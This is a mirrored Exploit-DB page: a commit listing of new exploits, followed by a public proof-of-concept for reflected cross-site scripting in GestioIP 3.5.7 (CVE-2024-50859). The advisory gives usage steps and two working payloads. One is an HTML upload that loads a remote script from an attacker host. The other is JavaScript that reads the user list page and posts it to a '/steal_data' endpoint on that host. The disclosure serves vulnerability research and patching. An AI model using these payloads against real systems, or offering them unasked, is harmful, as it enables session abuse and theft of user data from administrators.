bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/52202.txt
Exploit-DB 0f3d104e83 DB: 2025-04-15 
15 changes to exploits/shellcodes/ghdb

ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass
GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)
GestioIP 3.5.7 - Cross-Site Scripting (XSS)
GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
GestioIP 3.5.7 - Remote Command Execution (RCE)
GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS)
OpenPanel 0.3.4 - Directory Traversal
OpenPanel 0.3.4 - Incorrect Access Control
OpenPanel 0.3.4 - OS Command Injection
OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal

Pimcore 11.4.2 - Stored cross site scripting

Pimcore customer-data-framework 4.2.0 -  SQL injection

SilverStripe 5.3.8  - Stored Cross Site Scripting (XSS) (Authenticated)

Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection
2025-04-15 00:16:26 +00:00

58 lines
No EOL
1.9 KiB
Text
Raw Permalink Blame History

# Exploit Title: GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50859
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50859
### Description
The ip_import_acl_csv request is vulnerable to Reflected XSS (Reflected Cross-Site Scripting); the user can upload a file and the file content is reflected in the HTML response without being sanitized. If the file uploaded by the user has an incorrect format and an error occurs during its processing, part of the file's content may be displayed in the browser. If this content includes HTML or scripts and it is not properly escaped, the browser could interpret it, leading to a security vulnerability. This could allow data exfiltration and enabling CSRF (Cross-Site Request Forgery) attacks.
Proper input validation and output encoding are critical to prevent this vulnerability.
### Prerequisites
Enable (set to 'yes') the parameter:
Manage > Manage GestioIP > ACL connection management
### Usage
Select: import/export > Import ACLs/ACL Connections
Select: "Connection List"
Select "report only"
Browse to select the file you want to upload.
Click 'upload'
### Payloads
#### 1) html file to upload
<html><script src="http://10.20.0.1:8090/refxss_exfiltrate_3.js"></script></html>
#### 2) js file to exfiltrate data
var req1 = new XMLHttpRequest();
req1.open('GET',"http://localhost/gestioip/res/ip_show_user.cgi", false);
req1.send();
response = req1.responseText;
var req2 = new XMLHttpRequest();
req2.open('POST', "http://10.20.0.1:8000/steal_data", false);
req2.setRequestHeader('Content-Type', 'text/html');
req2.send(response);
Reference in a new issue View git blame Copy permalink